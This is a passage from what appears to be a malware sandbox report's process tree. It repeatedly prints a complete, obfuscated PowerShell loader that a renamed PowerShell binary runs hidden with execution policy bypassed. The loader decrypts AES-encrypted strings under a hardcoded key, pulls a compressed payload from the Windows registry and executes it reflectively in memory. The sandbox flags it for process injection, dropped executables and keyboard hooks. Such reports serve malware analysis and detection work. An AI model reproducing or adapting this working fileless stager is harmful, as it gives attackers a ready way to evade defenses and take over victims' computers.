[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:4352
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:5188
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5912
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] 